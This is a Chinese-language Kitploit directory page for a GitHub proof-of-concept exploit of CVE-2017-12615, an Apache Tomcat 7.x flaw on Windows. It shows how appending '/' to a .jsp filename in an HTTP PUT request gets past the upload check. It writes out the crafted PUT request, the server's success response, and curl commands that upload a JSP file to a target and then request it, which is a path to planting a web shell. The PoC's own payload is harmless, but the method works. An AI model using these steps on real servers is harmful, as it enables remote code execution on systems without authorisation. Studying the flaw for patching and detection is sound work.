Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2017-12615 — Apache Tomcat 7.0.x CVE-2017-12615 PUT JSP漏洞的POC利用程序。 | Kitploit
工具/GitHubGitHub/breaktoprotect/cve-2017-12615
Payload生成漏洞分析漏洞利用Web应用程序漏洞利用渗透测试
GitHubbreaktoprotect/cve-2017-12615

CVE-2017-12615

Apache Tomcat 7.0.x CVE-2017-12615 PUT JSP漏洞的POC利用程序。

查看仓库
112216年前Kitploit 审核通过

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

纪念Chia Junyuan (https://packetstormsecurity.com/files/author/11924/)

POC CVE-2017-12615

在Windows上运行的Apache Tomcat 7.0.0至7.0.79的POC漏洞利用;CVE-2017-12615 PUT JSP漏洞。

描述:

根据设计,不允许通过PUT方法向Apache Tomcat服务器上传JSP文件。 这很可能是一项安全措施,防止攻击者上传JSP后门并在服务器上获取远程代码执行权限。 然而,由于检查不充分,攻击者可以在启用了PUT的7.0.{0至79} Tomcat服务器上,通过使用特制的HTTP请求请求PUT方法,获取远程代码执行权限。但是说真的,特殊?拜托。

利用方法:

在文件名扩展名后附加一个'/'字符,可以绕过文件扩展名检查。就这么简单。所以,其实并没有那么特殊。

HTTP请求中的利用方法:

请求

root@kitploit:~
PUT /myfile.jsp/
Host: domain-name:port
Connection: close
Content-Length: 85

<% out.write("<html><body><h3>[+] JSP upload successfully.</h3></body></html>"); %>

预期成功响应

root@kitploit:~
HTTP/1.1 201 Created
Server: Apache-Coyote/1.1
Content-Length: 0
Date: Sat, 23 Sep 2017 06:36:36 GMT
Connection: close

使用'curl'进行利用:

  1. 创建一个.jsp文件(例如test.jsp):
root@kitploit:~
<% out.write("<html><body><h3>[+] JSP file successfully uploaded via curl and JSP out.write  executed.</h3></body></html>"); %>
  1. 对目标服务器执行curl命令:
root@kitploit:~
curl -X PUT http://target-host-or-ip-address:port/test.jsp/ -d @- < test.jsp
  1. 通过浏览目标地址检查文件是否上传,或执行:
root@kitploit:~
curl http://target-host-or-ip-address:port/test.jsp
下载工具